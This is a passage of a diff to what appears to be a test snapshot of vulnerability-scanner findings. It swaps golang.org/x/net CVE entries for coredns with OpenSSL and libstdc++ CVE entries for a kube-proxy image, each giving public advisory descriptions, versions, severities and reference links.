"https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://go.dev/cl/311090", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://go.dev/issue/46288", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0238", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", - ], - }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": "Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", + ], + }, + "category": "Vulnerability", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "openssl: RSA authentication weakness", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": 